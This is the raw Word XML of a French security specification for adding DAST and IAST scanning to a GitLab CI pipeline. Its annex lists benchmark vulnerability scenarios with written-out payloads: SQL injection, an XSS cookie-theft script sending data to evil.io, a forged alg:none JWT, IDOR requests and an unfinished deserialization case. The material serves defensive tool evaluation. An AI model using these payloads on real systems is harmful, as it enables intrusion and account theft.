            <w:tcW w:type="dxa" w:w="210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Runner dedie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Runner avec acces reseau aux envs cibles. Tags : security-scan, dast-runner. Docker executor obligatoire. Isole du runner de build standard.</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Architecte Infra</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Variables CI/CD securisees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Credentials de scan dans GitLab CI/CD Variables protegees et masquees. Scope par environnement. Jamais en clair dans .gitlab-ci.yml.</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DCS / SecByDesign</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Template centralise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Template dans repo_centralised_secure. Include via include: project. Versionne. Maintenu par equipe securite.</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Equipe Securite</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Stage security-scan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Stage dedie apres deploy-staging. Timeout 20 min strict. Gate bloquant CRITICAL. Separation IAST (test) / DAST (security-scan).</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DCS / MOA</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Connectivite reseau</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DNS + ports 80/443 entre runner et API cible. Proxy configure si env ferme.</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Architecte Infra</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Artifacts et rapports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Rapports SARIF en artifacts GitLab (TTL 90 jours). GitLab Security Dashboard active. Export VOC via webhook ou API REST.</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DCS / VOC</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Gate et politique blocage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Seuil CRITICAL bloquant. HIGH avertissement. Configurable par env et par tag API (FCI / non-FCI).</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MOA / SSI</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Coexistence SonarQube / Xray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Pas de conflit de stage. SCA + SAST + DAST + IAST = couverture complete sans angle mort.</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DCS / SecByDesign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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PR-09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Spec OpenAPI versionnee</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openapi.yaml versionne en repo. Variable DAST_API_SPECIFICATION configuree. Coverage-driven active si spec presente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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Equipe Dev / MOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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Tracabilite scans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Timestamp, branche, commit SHA journalises. Retention 1 an (DICT T:3).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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DCS / SSI</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2.5.1   Structure .gitlab-ci.yml de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D1117" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="110"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="110"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">include:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - project: 'lb-group6285803/repo_centralised_secure'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    file: 'templates/security/dast-iast.gitlab-ci.yml'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    ref: 'main'</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stages: [.pre, build, test, deploy-staging, security-dast, publish]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_TARGET_URL:          $CI_ENVIRONMENT_URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_API_SPEC:            openapi.yaml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_AUTH_TOKEN:          $DAST_SECRET_TOKEN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_SEVERITY_THRESHOLD:  CRITICAL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_RATE_LIMIT:          20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_EXCLUDE_URLS:        '/actuator,/health,/metrics,/swagger-ui'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  IAST_SERVER_URL:          $IAST_SERVER_URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  IAST_API_KEY:             $IAST_API_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Annexe A — Scenarios de Vulnerabilites — Cahier de Test Benchmark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Note : les scenarios ci-dessous sont des exemples illustratifs NON EXHAUSTIFS. Ils servent de base de test lors du benchmark. Chaque scenario precise le comportement attendu cote DAST (boite noire, trafic HTTP) et cote IAST (boite grise, execution interne).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SC-01 — Injection SQL via parametre API</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API3:2023 / A03:2021  |  CWE-89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Une API de recherche de comptes construit sa requete SQL par concatenation directe du parametre 'q' sans PreparedStatement. L'attaquant injecte du SQL pour extraire l'ensemble de la table.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/accounts/search       Base de donnees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GET ?q=' OR '1'='1   |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  SELECT * WHERE 1=1    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                       |-----------------------&gt;|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                       |   Tous les comptes     |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                       |&lt;-----------------------|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  HTTP 200 - tous       |                        |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |&lt;----------------------|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GET /api/v1/accounts/search?q=%27+OR+%271%27%3D%271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Accept: application/json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Detecte : payload SQL retourne plus de resultats qu'une requete normale. Difference comportementale entre payload neutre et SQLi. Finding : CWE-89, API3:2023, CVSS 9.8.</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Trace : source = HttpServletRequest.getParameter('q') -&gt; sink = Statement.execute() sans PreparedStatement. Taint non sanitise atteignant le sink SQL. Zero FP.</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SC-02 — Cross-Site Scripting (XSS) Reflechi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP A03:2021  |  CWE-79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Une API de messagerie retourne le contenu du champ 'body' sans encodage HTML. Ce contenu est rendu par le frontend Angular sans sanitization.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/messages        Frontend (victime)</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/messages |                      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  body: &lt;script&gt; |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201 Created    |                      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |&lt;----------------|                      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                 |  GET /messages/42    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                 |&lt;---------------------|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                 |  200 + &lt;script&gt;...   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                 |---------------------&gt;| JS execute -&gt; vol cookie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/api/v1/messages HTTP/1.1</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"recipient": "user@bank.fr",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   "body": "&lt;script&gt;fetch('https://evil.io/steal?c='+document.cookie)&lt;/script&gt;"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Soumet le payload XSS et verifie si &lt;script&gt; est retourne non encode dans GET /messages/{id}. Detection par reflexion. Limite : ne confirme pas l'execution JS cote navigateur.</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Trace : source = RequestBody.body -&gt; sink = HttpServletResponse.write() sans HtmlUtils.htmlEscape(). Detection taint sans sanitization. Si le framework encode automatiquement, pas de FP.</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SC-03 — JWT - Signature absente (alg:none) &amp; Algorithme faible</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API2:2023  |  CWE-347</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L'API accepte des JWT avec l'algorithme 'none' ou avec HS256 et une cle triviale. Un attaquant forge un token avec des claims arbitraires (role admin) sans connaitre la cle secrete.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/admin/users</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Decode JWT legitime   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  Modifie role:ADMIN    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  Supprime signature    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  (alg:none)            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                        |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  GET /admin/users      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  Bearer &lt;JWT forge&gt;    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |-----------------------&gt;|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                        |  Verifie alg:none -&gt; accepte</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  HTTP 200              |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |&lt;-----------------------|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GET /api/v1/admin/users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 Token forge : header={alg:none} + payload={role:ADMIN} + signature vide</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiIxIiwicm9sZSI6IkFETUlOIn0.</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Teste : (1) alg:none ; (2) HS256 avec cles faibles (secret, password, 123456) ; (3) modification des claims sans re-signer. Detection si reponse 200 au lieu de 401. CWE-347, CVSS 9.1.</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Detecte si Jwts.parser() sans .setSigningKey() ou mode permissif. Limite : si la lib valide l'alg cote framework, l'IAST peut ne pas instrumenter ce chemin.</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SC-04 — IDOR / BOLA - Acces aux donnees d'un autre utilisateur</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API1:2023  |  CWE-639</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L'API de consultation de releves utilise l'ID de compte dans l'URL sans verifier que l'utilisateur authentifie est proprietaire du compte. Un attaquant incremente l'ID.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Client (id=42)    API /accounts/{id}    Client victime (id=43)</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GET /accounts/42 -------&gt;|                       |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;-- 200 ses donnees -----||                       |</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GET /accounts/43 -------&gt;|                       |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">       |      Pas de verif. owner                  |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;-- 200 donnees de la victime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 Requete legitime (token user id=42)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/v1/accounts/42/statements HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer &lt;token_user_42&gt;</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IDOR : meme token, ID different - attendu : 403, obtenu : 200</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/v1/accounts/43/statements HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer &lt;token_user_42&gt;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Cree deux comptes de test (user_A, user_B), s'authentifie en user_A et tente d'acceder aux ressources de user_B. Detection si reponse 200 avec donnees differentes. Exige mode DAST multi-identites.</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Trace : PathVariable('accountId') -&gt; requete DB sans clause WHERE owner = currentUser(). Detection de l'absence de verification d'appartenance. Finding tres precis avec nom de la methode et ligne de code.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SC-05 — Deserialisation Non Securisee - DTO API Input</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP A08:2021  |  CWE-502</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9C1B1B" w:sz="1"/>
              <w:left w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:bottom w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:right w:val="single" w:color="9C1B1B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4CCCC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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Une API accepte un objet JSON deserialise en DTO Java via ObjectMapper avec enableDefaultTyping() active. Un attaquant envoie un payload gadget chain Jackson qui declenche l'execution de code arbitraire.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/transfers (POST)     Serveur JVM</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/transfers   |                    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  {@class:          |                    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
